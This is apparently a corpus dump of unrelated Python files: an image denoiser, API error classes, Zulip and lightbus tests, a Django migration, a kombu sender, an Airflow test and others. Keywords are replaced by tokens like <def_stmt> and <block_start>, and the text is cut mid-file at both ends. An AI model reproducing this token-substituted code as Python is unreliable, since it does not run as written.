"+word[1:])<block_end><else_stmt><block_start>f.write(word)<block_end><block_end>f.write("\t")<if_stmt>v[2]<eq>'LOCATION1'<block_start>f.write('location - 1 - ')<block_end><if_stmt>v[2]<eq>'LOCATION2'<block_start>f.write('location - 2 - ')<block_end><if_stmt>len(v[3])<eq>1<block_start>f.write(v[3][0]+"\t")<block_end><else_stmt><block_start>f.write("transit location\t")<block_end>f.write(v[4]+"\n")<block_end><block_end> |
<def_stmt>extractLizonkanovelsWordpressCom item<block_start>'''
Parser for 'lizonkanovels.wordpress.com'
'''<line_sep>vol,chp,frag,postfix=extractVolChapterFragmentPostfix(item['title'])<if_stmt><not>(chp<or>vol)<or>"preview"<in>item['title'].lower()<block_start><return><none><block_end>tagmap=[('bestial blade by priest' 'bestial blade' 'translated') ('creatures of habit by meat in the shell' 'creatures of habit' 'translated') ('seal cultivation for self-improvement by mo xiao xian' 'seal cultivation for self-improvement' 'translated') ('PRC' 'PRC' 'translated') ('Loiterous' 'Loiterous' 'oel') ]<for_stmt>tagname,name,tl_type tagmap<block_start><if_stmt>tagname<in>item['tags']<block_start><return>buildReleaseMessageWithType(item name vol chp frag=frag postfix=postfix tl_type=tl_type)<block_end><block_end><return><false><block_end> |
# -*- coding: utf-8 -*-
# @Time : 2017/7/13 下午9:56
# @Author : play4fun
# @File : 1-fastNlMeansDenoisingColored.py
# @Software: PyCharm
"""
1-fastNlMeansDenoisingColored.py:
"""<import_stmt>numpy<as>np<import_stmt>cv2<import_from_stmt>matplotlib pyplot<as>plt<line_sep>img=cv2.imread('die.png')<line_sep>img=cv2.cvtColor(img code=cv2.COLOR_BGR2RGB)<line_sep>dst=cv2.fastNlMeansDenoisingColored(img <none> 10 10 7 21)<line_sep># dst2=cv2.cvtColor(dst,code=cv2.COLOR_BGR2RGB)
plt.subplot(121) plt.imshow(img)<line_sep>plt.subplot(122) plt.imshow(dst)<line_sep># plt.subplot(122), plt.imshow(dst2)
plt.show()<line_sep> |
# API Error Codes
AUTHORIZATION_FAILED=5# Invalid access token
PERMISSION_IS_DENIED=7<line_sep>CAPTCHA_IS_NEEDED=14<line_sep>ACCESS_DENIED=15# No access to call this method
INVALID_USER_ID=113# User deactivated
<class_stmt>VkException(Exception)<block_start><pass><block_end><class_stmt>VkAuthError(VkException)<block_start><pass><block_end><class_stmt>VkAPIError(VkException)<block_start>__slots__=['error' 'code' 'message' 'request_params' 'redirect_uri']<line_sep>CAPTCHA_NEEDED=14<line_sep>ACCESS_DENIED=15<def_stmt>__init__ self error_data<block_start>super(VkAPIError self).__init__()<line_sep>self.error_data=error_data<line_sep>self.code=error_data.get('error_code')<line_sep>self.message=error_data.get('error_msg')<line_sep>self.request_params=self.get_pretty_request_params(error_data)<line_sep>self.redirect_uri=error_data.get('redirect_uri')<block_end>@staticmethod<def_stmt>get_pretty_request_params error_data<block_start>request_params=error_data.get('request_params' ())<line_sep>request_params={param['key']:param['value']<for>param request_params}<line_sep><return>request_params<block_end><def_stmt>is_access_token_incorrect self<block_start><return>self.code<eq>self.ACCESS_DENIED<and>'access_token'<in>self.message<block_end><def_stmt>is_captcha_needed self<block_start><return>self.code<eq>self.CAPTCHA_NEEDED<block_end>@property<def_stmt>captcha_sid self<block_start><return>self.error_data.get('captcha_sid')<block_end>@property<def_stmt>captcha_img self<block_start><return>self.error_data.get('captcha_img')<block_end><def_stmt>__str__ self<block_start>error_message='{self.code}. {self.message}. request_params = {self.request_params}'.format(self=self)<if_stmt>self.redirect_uri<block_start>error_message<augadd>',\nredirect_uri = "{self.redirect_uri}"'.format(self=self)<block_end><return>error_message<block_end><block_end> |
# -*- coding: UTF-8 -*-
"""
@author: hhyo
@license: Apache Licence
@file: pt_archiver.py
@time: 2020/01/10
"""<import_from_stmt>common.config SysConfig<import_from_stmt>sql.plugins.plugin Plugin<line_sep>__author__='hhyo'<class_stmt>PtArchiver(Plugin)<block_start>"""
pt-archiver归档数据
"""<def_stmt>__init__ self<block_start>self.path='pt-archiver'<line_sep>self.required_args=[]<line_sep>self.disable_args=['analyze']<line_sep>super(Plugin self).__init__()<block_end><def_stmt>generate_args2cmd self args shell<block_start>"""
转换请求参数为命令行
:param args:
:param shell:
:return:
"""<line_sep>k_options=['no-version-check' 'statistics' 'bulk-insert' 'bulk-delete' 'purge' 'no-delete']<line_sep>kv_options=['source' 'dest' 'file' 'where' 'progress' 'charset' 'limit' 'txn-size' 'sleep']<if_stmt>shell<block_start>cmd_args=self.path<if>self.path<else>''<for_stmt>name,value args.items()<block_start><if_stmt>name<in>k_options<and>value<block_start>cmd_args<augadd>f' --{name}'<block_end><elif_stmt>name<in>kv_options<block_start><if_stmt>name<eq>'where'<block_start>cmd_args<augadd>f' --{name} "{value}"'<block_end><else_stmt><block_start>cmd_args<augadd>f' --{name} {value}'<block_end><block_end><block_end><block_end><else_stmt><block_start>cmd_args=[self.path]<for_stmt>name,value args.items()<block_start><if_stmt>name<in>k_options<and>value<block_start>cmd_args.append(f'--{name}')<block_end><elif_stmt>name<in>kv_options<block_start>cmd_args.append(f'--{name}')<line_sep>cmd_args.append(f'{value}')<block_end><block_end><block_end><return>cmd_args<block_end><block_end> |
<import_from_future_stmt> print_function<import_stmt>os<import_stmt>argparse<import_stmt>torch<import_stmt>torch.backends.cudnn<as>cudnn<import_stmt>numpy<as>np<import_from_stmt>data cfg_mnet cfg_slim cfg_rfb<import_from_stmt>layers.functions.prior_box PriorBox<import_from_stmt>utils.nms.py_cpu_nms py_cpu_nms<import_stmt>cv2<import_from_stmt>thop profile<import_from_stmt>thop clever_format<import_from_stmt>models.retinaface RetinaFace<import_from_stmt>models.net_slim Slim<import_from_stmt>models.net_rfb RFB<import_from_stmt>utils.box_utils decode decode_landm<import_from_stmt>utils.timer Timer<line_sep>parser=argparse.ArgumentParser(description='Test')<line_sep>parser.add_argument('--network' default='mobile0.25' help='Backbone network mobile0.25 or slim or RFB')<line_sep>parser.add_argument('--long_side' default=320 help='when origin_size is false, long_side is scaled size(320 or 640 for long side)')<line_sep>args=parser.parse_args()<if_stmt>__name__<eq>'__main__'<block_start>torch.set_grad_enabled(<false>)<line_sep>cfg=<none><line_sep>net=<none><if_stmt>args.network<eq>"mobile0.25"<block_start>cfg=cfg_mnet<line_sep>net=RetinaFace(cfg=cfg phase='test')<block_end><elif_stmt>args.network<eq>"slim"<block_start>cfg=cfg_slim<line_sep>net=Slim(cfg=cfg phase='test')<block_end><elif_stmt>args.network<eq>"RFB"<block_start>cfg=cfg_rfb<line_sep>net=RFB(cfg=cfg phase='test')<block_end><else_stmt><block_start>print("Don't support network!")<line_sep>exit(0)<block_end>long_side=int(args.long_side)<line_sep>short_side=int(args.long_side/4<times>3)<line_sep>img=torch.randn(1 3 long_side short_side)<line_sep>flops,params=profile(net inputs=(img ))<line_sep>flops,params=clever_format([flops params] "%.3f")<line_sep>print("param:" params "flops:" flops)<block_end> |
# encoding: utf-8
# module Grasshopper.Kernel.Geometry.ConvexHull calls itself ConvexHull
# from Grasshopper,Version=1.0.0.20,Culture=neutral,PublicKeyToken=dda4f5ec2cd80803
# by generator 1.145
""" NamespaceTracker represent a CLS namespace. """<line_sep># no imports
# no functions
# classes
<class_stmt>Solver(object)# no doc
<block_start>@staticmethod<def_stmt>Compute nodes hull<block_start>""" Compute(nodes: Node2List,hull: List[int]) -> bool """<line_sep><pass><block_end>@staticmethod<def_stmt>ComputeHull *__args<block_start>"""
ComputeHull(pts: Node2List) -> Polyline
ComputeHull(GH_pts: IEnumerable[GH_Point],plane: Plane) -> (Polyline,Plane)
ComputeHull(GH_pts: IEnumerable[GH_Point]) -> Polyline
"""<line_sep><pass><block_end><block_end> |
<import_stmt>json<import_stmt>os<import_stmt>unittest<import_from_stmt>collections OrderedDict<import_from_stmt>importlib import_module<import_from_stmt>pathlib Path<import_from_stmt>types ModuleType<import_from_stmt>typing Any Dict<import_from_stmt>unittest mock<import_from_stmt>zulip_bots.finder metadata<import_from_stmt>zulip_bots.lib BotHandler<import_from_stmt>zulip_botserver server<import_from_stmt>zulip_botserver.input_parameters parse_args<import_from_stmt>.server_test_lib BotServerTestCase<class_stmt>BotServerTests(BotServerTestCase)<block_start><class_stmt>MockMessageHandler<block_start><def_stmt>handle_message self message:Dict[str str] bot_handler:BotHandler<arrow><none><block_start><assert_stmt>message<eq>{"key":"test message"}<block_end><block_end><class_stmt>MockLibModule<block_start><def_stmt>handler_class self<arrow>Any<block_start><return>BotServerTests.MockMessageHandler()<block_end><block_end><def_stmt>setUp self<arrow><none># Since initializing Client invokes `get_server_settings` that fails in the test
# environment, we need to mock it to pretend that there exists a backend.
<block_start>super().setUp()<line_sep>self.patch=mock.patch("zulip.Client.get_server_settings" return_value=mock.Mock())<line_sep>self.patch.start()<block_end><def_stmt>test_successful_request self<arrow><none><block_start>available_bots=["helloworld"]<line_sep>bots_config={"helloworld":{"email":"<EMAIL>" "key":"123456789qwertyuiop" "site":"http://localhost" "token":"<KEY>" }}<line_sep>self.assert_bot_server_response(available_bots=available_bots bots_config=bots_config event=dict(message={"content":"@**test** test message"} bot_email="<EMAIL>" trigger="mention" token="<KEY>" ) expected_response="beep boop" check_success=<true> )<block_end><def_stmt>test_successful_request_from_two_bots self<arrow><none><block_start>available_bots=["helloworld" "help"]<line_sep>bots_config={"helloworld":{"email":"<EMAIL>" "key":"123456789qwertyuiop" "site":"http://localhost" "token":"<KEY>" } "help":{"email":"<EMAIL>" "key":"123456789qwertyuiop" "site":"http://localhost" "token":"<KEY>" } }<line_sep>self.assert_bot_server_response(available_bots=available_bots event=dict(message={"content":"@**test** test message"} bot_email="<EMAIL>" trigger="mention" token="<KEY>" ) expected_response="beep boop" bots_config=bots_config check_success=<true> )<block_end><def_stmt>test_request_for_unkown_bot self<arrow><none><block_start>bots_config={"helloworld":{"email":"<EMAIL>" "key":"123456789qwertyuiop" "site":"http://localhost" "token":"<KEY>" } }<line_sep>self.assert_bot_server_response(available_bots=["helloworld"] event=dict(message={"content":"test message"} bot_email="<EMAIL>") bots_config=bots_config check_success=<false> )<block_end><def_stmt>test_wrong_bot_token self<arrow><none><block_start>available_bots=["helloworld"]<line_sep>bots_config={"helloworld":{"email":"<EMAIL>" "key":"123456789qwertyuiop" "site":"http://localhost" "token":"<KEY>" }}<line_sep>self.assert_bot_server_response(available_bots=available_bots bots_config=bots_config event=dict(message={"content":"@**test** test 
message"} bot_email="<EMAIL>" trigger="mention" token="wrongtoken" ) check_success=<false> )<block_end>@mock.patch("logging.error")@mock.patch("zulip_bots.lib.StateHandler")<def_stmt>test_wrong_bot_credentials self mock_StateHandler:mock.Mock mock_LoggingError:mock.Mock<arrow><none><block_start>available_bots=["nonexistent-bot"]<line_sep>bots_config={"nonexistent-bot":{"email":"<EMAIL>" "key":"123456789qwertyuiop" "site":"http://localhost" "token":"<KEY>" }}<with_stmt>self.assertRaisesRegex(SystemExit 'Error: Bot "nonexistent-bot" doesn\'t exist. Please make '<concat>"sure you have set up the botserverrc file correctly." )<block_start>self.assert_bot_server_response(available_bots=available_bots event=dict(message={"content":"@**test** test message"} bot_email="<EMAIL>" trigger="mention" token="<KEY>" ) bots_config=bots_config )<block_end><block_end>@mock.patch("sys.argv" ["zulip-botserver" "--config-file" "/foo/bar/baz.conf"])<def_stmt>test_argument_parsing_defaults self<arrow><none><block_start>opts=parse_args()<assert_stmt>opts.config_file<eq>"/foo/bar/baz.conf"<assert_stmt>opts.bot_name<is><none><assert_stmt>opts.bot_config_file<is><none><assert_stmt>opts.hostname<eq>"127.0.0.1"<assert_stmt>opts.port<eq>5002<block_end><def_stmt>test_read_config_from_env_vars self<arrow><none># We use an OrderedDict so that the order of the entries in
# the stringified environment variable is standard even on
# Python 3.7 and earlier.
<block_start>bots_config=OrderedDict()<line_sep>bots_config["hello_world"]={"email":"<EMAIL>" "key":"value" "site":"http://localhost" "token":"<KEY>" }<line_sep>bots_config["giphy"]={"email":"<EMAIL>" "key":"value2" "site":"http://localhost" "token":"<KEY>" }<line_sep>os.environ["ZULIP_BOTSERVER_CONFIG"]=json.dumps(bots_config)<line_sep># No bot specified; should read all bot configs
<assert_stmt>server.read_config_from_env_vars()<eq>bots_config<line_sep># Specified bot exists; should read only that section.
<assert_stmt>server.read_config_from_env_vars("giphy")<eq>{"giphy":bots_config["giphy"]}<line_sep># Specified bot doesn't exist; should read the first section of the config.
<assert_stmt>server.read_config_from_env_vars("redefined_bot")<eq>{"redefined_bot":bots_config["hello_world"]}<block_end><def_stmt>test_read_config_file self<arrow><none><block_start><with_stmt>self.assertRaises(IOError)<block_start>server.read_config_file("nonexistentfile.conf")<block_end>current_dir=os.path.dirname(os.path.abspath(__file__))<line_sep># No bot specified; should read all bot configs.
bot_conf1=server.read_config_file(os.path.join(current_dir "test.conf"))<line_sep>expected_config1={"helloworld":{"email":"<EMAIL>" "key":"value" "site":"http://localhost" "token":"<KEY>" } "giphy":{"email":"<EMAIL>" "key":"value2" "site":"http://localhost" "token":"<KEY>" } }<assert_stmt>json.dumps(bot_conf1 sort_keys=<true>)<eq>json.dumps(expected_config1 sort_keys=<true>)<line_sep># Specified bot exists; should read only that section.
bot_conf3=server.read_config_file(os.path.join(current_dir "test.conf") "giphy")<line_sep>expected_config3={"giphy":{"email":"<EMAIL>" "key":"value2" "site":"http://localhost" "token":"<KEY>" }}<assert_stmt>json.dumps(bot_conf3 sort_keys=<true>)<eq>json.dumps(expected_config3 sort_keys=<true>)<line_sep># Specified bot doesn't exist; should read the first section of the config.
bot_conf2=server.read_config_file(os.path.join(current_dir "test.conf") "redefined_bot")<line_sep>expected_config2={"redefined_bot":{"email":"<EMAIL>" "key":"value" "site":"http://localhost" "token":"<KEY>" }}<assert_stmt>json.dumps(bot_conf2 sort_keys=<true>)<eq>json.dumps(expected_config2 sort_keys=<true>)<block_end><def_stmt>test_load_lib_modules self<arrow><none># This testcase requires hardcoded paths, which here is a good thing so if we ever
# restructure zulip_bots, this test would fail and we would also update Botserver
# at the same time.
<block_start>helloworld=import_module("zulip_bots.bots.{bot}.{bot}".format(bot="helloworld"))<line_sep>root_dir=Path(__file__).parents[2].as_posix()<line_sep># load valid module name
module=server.load_lib_modules(["helloworld"])["helloworld"]<assert_stmt>module<eq>helloworld<line_sep># load valid file path
path=Path(root_dir "zulip_bots/zulip_bots/bots/{bot}/{bot}.py".format(bot="helloworld")).as_posix()<line_sep>module=server.load_lib_modules([path])[path]<assert_stmt>module.__name__<eq>"custom_bot_module"<assert_stmt>module.__file__<eq>path<assert_stmt>isinstance(module ModuleType)<line_sep># load invalid module name
<with_stmt>self.assertRaisesRegex(SystemExit 'Error: Bot "botserver-test-case-random-bot" doesn\'t exist. '<concat>"Please make sure you have set up the botserverrc file correctly." )<block_start>module=server.load_lib_modules(["botserver-test-case-random-bot"])["botserver-test-case-random-bot"]<block_end># load invalid file path
<with_stmt>self.assertRaisesRegex(SystemExit 'Error: Bot "{}/zulip_bots/zulip_bots/bots/helloworld.py" doesn\'t exist. '<concat>"Please make sure you have set up the botserverrc file correctly.".format(root_dir) )<block_start>path=Path(root_dir "zulip_bots/zulip_bots/bots/{bot}.py".format(bot="helloworld")).as_posix()<line_sep>module=server.load_lib_modules([path])[path]<block_end><block_end>@mock.patch("zulip_botserver.server.app")@mock.patch("sys.argv" ["zulip-botserver" "--config-file" "/foo/bar/baz.conf"])<def_stmt>test_load_from_registry self mock_app:mock.Mock<arrow><none><block_start>packaged_bot_module=mock.MagicMock(__version__="1.0.0" __file__="asd")<line_sep>packaged_bot_entrypoint=metadata.EntryPoint("packaged_bot" "module_name" "zulip_bots.registry")<line_sep>bots_config={"packaged_bot":{"email":"<EMAIL>" "key":"value" "site":"http://localhost" "token":"<KEY>" }}<with_stmt>mock.patch("zulip_botserver.server.read_config_file" return_value=bots_config) mock.patch("zulip_botserver.server.lib.ExternalBotHandler" new=mock.Mock()) mock.patch("zulip_bots.finder.metadata.EntryPoint.load" return_value=packaged_bot_module ) mock.patch("zulip_bots.finder.metadata.entry_points" return_value=(packaged_bot_entrypoint ) )<block_start>server.main()<block_end>mock_app.config.__setitem__.assert_any_call("BOTS_LIB_MODULES" {"packaged_bot":packaged_bot_module})<block_end><block_end><if_stmt>__name__<eq>"__main__"<block_start>unittest.main()<block_end> |
# ------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License (MIT). See LICENSE in the repo root for license information.
# ------------------------------------------------------------------------------------------
<import_stmt>logging<import_from_stmt>pathlib Path<import_from_stmt>typing Any Dict List<import_stmt>numpy<as>np<import_stmt>torch<import_from_stmt>sklearn.metrics roc_auc_score<import_from_stmt>InnerEyeDataQuality.configs.config_node ConfigNode<import_from_stmt>InnerEyeDataQuality.deep_learning.model_inference inference_ensemble<import_from_stmt>InnerEyeDataQuality.deep_learning.utils load_selector_config<import_from_stmt>InnerEyeDataQuality.selection.selectors.base SampleSelector<import_from_stmt>InnerEyeDataQuality.selection.selectors.bald BaldSelector<import_from_stmt>InnerEyeDataQuality.selection.selectors.graph GraphBasedSelector GraphParameters<import_from_stmt>InnerEyeDataQuality.selection.selectors.label_based LabelBasedDecisionRule PosteriorBasedSelector<import_from_stmt>InnerEyeDataQuality.selection.simulation_statistics get_ambiguous_sample_ids<import_from_stmt>InnerEyeDataQuality.utils.custom_types SelectorTypes<as>ST<import_from_stmt>InnerEyeDataQuality.utils.plot plot_model_embeddings<def_stmt>evaluate_ambiguous_case_detection bald_score:np.ndarray labels_complete:np.ndarray<arrow><none><block_start>uncertain_cases=np.zeros_like(bald_score)<line_sep>true_ambiguous_cases=get_ambiguous_sample_ids(labels_complete)<line_sep>uncertain_cases[true_ambiguous_cases]=1<line_sep>auc_=roc_auc_score(y_true=uncertain_cases y_score=bald_score)<line_sep>logging.info(f'BALD ambiguous detection AUC: {float(auc_):.2f}')<block_end><def_stmt>pretty_selector_name _type:str model_name:str<arrow>str<block_start>type_dict={'BaldSelector':<none> 'PosteriorBasedSelector':<none> 'PosteriorBasedSelectorJoint':'With entropy' 'GraphBasedSelector':'Graph'}<line_sep>_type=type_dict[_type]# type: ignore
<return>f'{model_name} ({_type})'<if>_type<else>f'{model_name}'<block_end><def_stmt>get_selector _type:str cfg:ConfigNode **pars:Any<arrow>SampleSelector<block_start>name=pars["name"]<line_sep>num_samples=pars["dataset"].num_samples<line_sep>num_classes=pars["dataset"].num_classes<line_sep>sample_indices=pars["dataset"].indices<line_sep>embeddings=pars["embeddings"]<line_sep>avg_posteriors=pars["avg_posteriors"]<line_sep>all_posteriors=pars["all_posteriors"]<line_sep>output_directory=pars["output_directory"]<line_sep>trainer=pars["trainer"]<line_sep>use_active_relabelling=pars["use_active_relabelling"]<if_stmt>ST(_type)<is>ST.GraphBasedSelector<block_start>distance_metric="cosine"<if>(cfg.model.resnet.apply_l2_norm<or>cfg.train.use_self_supervision)<else>"euclidean"<line_sep>graph_params=GraphParameters(n_neighbors=num_samples<floordiv>200 diffusion_alpha=0.90 cg_solver_max_iter=10 diffusion_batch_size=num_samples<floordiv>200 distance_kernel=distance_metric)<line_sep><return>GraphBasedSelector(num_samples num_classes embeddings sample_indices=sample_indices name=name graph_params=graph_params)<block_end><elif_stmt>ST(_type)<is>ST.BaldSelector<block_start><return>BaldSelector(posteriors=all_posteriors num_samples=num_samples num_classes=num_classes name=name trainer=trainer use_active_relabelling=use_active_relabelling)<block_end><elif_stmt>ST(_type)<is>ST.PosteriorBasedSelector<block_start><return>PosteriorBasedSelector(avg_posteriors num_samples num_classes=num_classes name=name decision_rule=LabelBasedDecisionRule.CROSS_ENTROPY output_directory=output_directory trainer=trainer use_active_relabelling=use_active_relabelling)<block_end><elif_stmt>ST(_type)<is>ST.PosteriorBasedSelectorJoint<block_start><return>PosteriorBasedSelector(avg_posteriors num_samples num_classes=num_classes name=name decision_rule=LabelBasedDecisionRule.JOINT output_directory=output_directory trainer=trainer 
use_active_relabelling=use_active_relabelling)<block_end><else_stmt><block_start><raise>ValueError("Unknown selector type is specified")<block_end><block_end><def_stmt>get_user_specified_selectors list_configs:List[str] dataset:Any output_path:Path plot_embeddings:bool=<false><arrow>Dict[str SampleSelector]<block_start>"""
Load the user specific configs, get the embeddings and return the selectors.
:param list_configs:
:return: dictionary of selector
"""<line_sep>logging.info("Loading the selector configs:\n {0}".format('\n'.join(list_configs)))<line_sep>user_specified_selectors=dict()<for_stmt>cfg [load_selector_config(cfg)<for>cfg list_configs]# Collect model probability predictions for the given set of images in the training set.
<block_start>embeddings,avg_posteriors,all_posteriors,trainer=inference_ensemble(dataset cfg)<assert_stmt>avg_posteriors.shape[0]<eq>dataset.num_samples<if_stmt>plot_embeddings<block_start>sample_label_counts=dataset.label_counts<line_sep>plot_model_embeddings(embeddings=embeddings label_distribution=sample_label_counts label_names=dataset.get_label_names() save_path=output_path)<block_end><for_stmt>_type cfg.selector.type<block_start>selector_params={"dataset":dataset "trainer":trainer<if>cfg.selector.use_active_relabelling<else><none> "embeddings":embeddings "avg_posteriors":avg_posteriors "all_posteriors":all_posteriors "output_directory":cfg.selector.output_directory "use_active_relabelling":cfg.selector.use_active_relabelling "name":pretty_selector_name(_type cfg.selector.model_name)}<line_sep>selector_name=pretty_selector_name(_type cfg.selector.model_name)<line_sep>user_specified_selectors[selector_name]=get_selector(_type cfg **selector_params)<block_end><block_end><return>user_specified_selectors<block_end><def_stmt>update_trainer_for_simulation selector:Any seed:int<arrow><none><block_start><if_stmt>selector.trainer<is><none><block_start><return><block_end># check if device_id is within the range
num_gpus=torch.cuda.device_count()<line_sep>device_id=seed%num_gpus<line_sep># set the device attribute in config object
selector.trainer.config.defrost()<line_sep>selector.trainer.config.device=device_id<line_sep>selector.trainer.config.train.seed=seed<line_sep>selector.trainer.config.train.dataloader.num_workers=0<line_sep>selector.trainer.config.validation.dataloader.num_workers=0<line_sep>selector.trainer.config.freeze()<line_sep>selector.trainer.device=torch.device(device_id)<line_sep># migrate all parameters to the given device
selector.trainer.models=[model.to(device_id)<for>model selector.trainer.models]<block_end> |
<import_stmt>demistomock<as>demisto# noqa: F401
<import_from_stmt>CommonServerPython *# noqa: F401
COLORS={'1 - New':'#00CD33' # (success green)
'2 - In Progress':'#7995D4' # (royal blue)
'3 - On Hold':'#FF9000' # (warning orange)
'4 - Awaiting Caller':'#FF9000' # (warning orange)
'5 - Awaiting Evidence':'#FF9000' # (warning orange)
'6 - Resolved':'#89A5C1' # (polo)
'7 - Closed':'#9AA0A3' # (natural grey)
'8 - Canceled':'#FF1744'# (alert-red)
}<line_sep>TEXT={'1 - New':'New' '2 - In Progress':'In Progress' '3 - On Hold':'On-Hold' '4 - Awaiting Caller':'Awaiting Caller' '5 - Awaiting Evidence':'Awaiting Evidence' '6 - Resolved':'Resolved' '7 - Closed':'Closed' '8 - Canceled':'Canceled'}<line_sep>incident=demisto.incidents()<line_sep>service_now_state=(incident[0].get('CustomFields' {}).get('servicenowstate'))<try_stmt><block_start>text_color=COLORS[service_now_state]<line_sep>text_content=TEXT[service_now_state]<block_end><except_stmt>Exception<as>e<block_start>demisto.debug(f'SnowIncidentStatus debug - state is: {service_now_state}\n{e}')<line_sep>text_color='#000000'<line_sep>text_content='Pending Update'<block_end>html=f"<div style='color:{text_color};text-align:center;'><h2>{text_content}</h2></div>"<line_sep>demisto.results({'ContentsFormat':formats['html'] 'Type':entryTypes['note'] 'Contents':html})<line_sep> |
<import_stmt>pytest<import_from_stmt>lightbus Api Event<import_from_stmt>lightbus.api ApiRegistry<import_from_stmt>lightbus.exceptions MisconfiguredApiOptions InvalidApiEventConfiguration InvalidApiRegistryEntry UnknownApi <line_sep>pytestmark=pytest.mark.unit<line_sep>@pytest.fixture()<def_stmt>SimpleApi <block_start><class_stmt>SimpleApi(Api)<block_start><class_stmt>Meta<block_start>name="simple.api"<block_end><block_end><return>SimpleApi<block_end>@pytest.fixture()<def_stmt>registry <block_start><return>ApiRegistry()<block_end><def_stmt>test_api_named_default # Apis can not start with the name 'default'
<block_start><with_stmt>pytest.raises(MisconfiguredApiOptions)<block_start><class_stmt>BadApi(Api)<block_start><class_stmt>Meta<block_start>name="default"<block_end><block_end><block_end><block_end><def_stmt>test_api_named_default_dot_something # Apis can not start with the name 'default'
<block_start><with_stmt>pytest.raises(MisconfiguredApiOptions)<block_start><class_stmt>BadApi(Api)<block_start><class_stmt>Meta<block_start>name="default.foo"<block_end><block_end><block_end><block_end><def_stmt>test_pass_string_as_event_params # Check we cannot accidentally pass a string to Event in the
# case that we omit a ',' when specifying a parameters tuple
<block_start><with_stmt>pytest.raises(InvalidApiEventConfiguration)<block_start>Event(parameters=("foo"))<block_end><block_end><def_stmt>test_api_registry_add_ok SimpleApi registry<block_start>registry.add(SimpleApi())<assert_stmt>"simple.api"<in>registry._apis<block_end><def_stmt>test_api_registry_add_class SimpleApi registry<block_start><with_stmt>pytest.raises(InvalidApiRegistryEntry)<block_start>registry.add(SimpleApi)<block_end><block_end><def_stmt>test_api_registry_get_ok SimpleApi registry<block_start>api=SimpleApi()<line_sep>registry.add(api)<assert_stmt>registry.get("simple.api")<eq>api<block_end><def_stmt>test_api_registry_get_unknown SimpleApi registry<block_start><with_stmt>pytest.raises(UnknownApi)<block_start>registry.get("unknown.api")<block_end><block_end><def_stmt>test_api_registry_remove_ok SimpleApi registry<block_start>registry.add(SimpleApi())<line_sep>registry.remove("simple.api")<assert_stmt><not>registry._apis<block_end><def_stmt>test_api_registry_remove_unknown SimpleApi registry<block_start><with_stmt>pytest.raises(UnknownApi)<block_start>registry.remove("unknown.api")<block_end><block_end><def_stmt>test_api_registry_internal registry<block_start><class_stmt>InternalApi(Api)<block_start><class_stmt>Meta<block_start>name="internal.api"<line_sep>internal=<true><block_end><block_end>api=InternalApi()<line_sep>registry.add(api)<assert_stmt>registry.internal()<eq>[api]<assert_stmt>registry.public()<eq>[]<block_end><def_stmt>test_api_registry_public SimpleApi registry<block_start>api=SimpleApi()<line_sep>registry.add(api)<assert_stmt>registry.public()<eq>[api]<assert_stmt>registry.internal()<eq>[]<block_end><def_stmt>test_api_registry_all SimpleApi registry<block_start>api=SimpleApi()<line_sep>registry.add(api)<assert_stmt>registry.all()<eq>[api]<block_end><def_stmt>test_api_registry_names SimpleApi registry<block_start>api=SimpleApi()<line_sep>registry.add(api)<assert_stmt>registry.names()<eq>["simple.api"]<block_end> |
# Generated by Django 2.2.12 on 2020-04-26 17:53
<import_from_stmt>django.db migrations models<class_stmt>Migration(migrations.Migration)<block_start>dependencies=[("zerver" "0273_migrate_old_bot_messages") ]<line_sep>operations=[migrations.AlterField(model_name="stream" name="invite_only" field=models.BooleanField(default=<false> null=<true>) ) migrations.AlterField(model_name="subscription" name="audible_notifications" field=models.BooleanField(default=<none> null=<true>) ) migrations.AlterField(model_name="subscription" name="desktop_notifications" field=models.BooleanField(default=<none> null=<true>) ) migrations.AlterField(model_name="subscription" name="email_notifications" field=models.BooleanField(default=<none> null=<true>) ) migrations.AlterField(model_name="subscription" name="is_muted" field=models.BooleanField(default=<false> null=<true>) ) migrations.AlterField(model_name="subscription" name="push_notifications" field=models.BooleanField(default=<none> null=<true>) ) migrations.AlterField(model_name="subscription" name="wildcard_mentions_notify" field=models.BooleanField(default=<none> null=<true>) ) migrations.AlterField(model_name="userprofile" name="enter_sends" field=models.BooleanField(default=<false> null=<true>) ) ]<block_end> |
"""
Example that sends a single message and exits using the simple interface.
You can use `simple_receive.py` (or `complete_receive.py`) to receive the
message sent.
"""<import_stmt>eventlet<import_from_stmt>kombu Connection<line_sep>eventlet.monkey_patch()<def_stmt>send_many n#: Create connection
#: If hostname, userid, password and virtual_host is not specified
#: the values below are the default, but listed here so it can
#: be easily changed.
<block_start><with_stmt>Connection('amqp://guest:guest@localhost:5672//')<as>connection#: SimpleQueue mimics the interface of the Python Queue module.
#: First argument can either be a queue name or a kombu.Queue object.
#: If a name, then the queue will be declared with the name as the
#: queue name, exchange name and routing key.
<block_start><with_stmt>connection.SimpleQueue('kombu_demo')<as>queue<block_start><def_stmt>send_message i<block_start>queue.put({'hello':f'world{i}'})<block_end>pool=eventlet.GreenPool(10)<for_stmt>i range(n)<block_start>pool.spawn(send_message i)<block_end>pool.waitall()<block_end><block_end><block_end><if_stmt>__name__<eq>'__main__'<block_start>send_many(10)<block_end> |
<import_stmt>unittest<import_stmt>sys<line_sep>sys.path.insert(1 '../resources')<import_stmt>importlib.util<def_stmt>load_file_as_module filepath<block_start>spec=importlib.util.spec_from_file_location("dag" filepath)<line_sep>compiled_dag_lib=importlib.util.module_from_spec(spec)<line_sep>spec.loader.exec_module(compiled_dag_lib)<line_sep><return>compiled_dag_lib<block_end><class_stmt>TestCompiledAirflowTemplate(unittest.TestCase)<block_start><def_stmt>test_should_run_compiled_airflow_template self<block_start>compiled_dag_lib=load_file_as_module('../resources/expected_compiled_template.py')<line_sep>dag=compiled_dag_lib.dag<line_sep>self.assertEqual('foo' dag.dag_id)<line_sep>self.assertEqual(5 len(dag.tasks))<line_sep>self.assertEqual("bq" dag.tasks[0].task_id)<line_sep>self.assertEqual("hook_transporter" dag.tasks[1].task_id)<line_sep>self.assertEqual("hook_predator" dag.tasks[2].task_id)<line_sep>self.assertEqual("wait_foo-intra-dep-job-bq" dag.tasks[3].task_id)<line_sep>self.assertEqual("wait_foo-inter-dep-job-bq" dag.tasks[4].task_id)<line_sep>self.assertEqual("SuperKubernetesPodOperator" dag.tasks[0].__class__.__name__)<line_sep>self.assertEqual("SuperKubernetesPodOperator" dag.tasks[1].__class__.__name__)<line_sep>self.assertEqual("SuperKubernetesPodOperator" dag.tasks[2].__class__.__name__)<line_sep>self.assertEqual("SuperExternalTaskSensor" 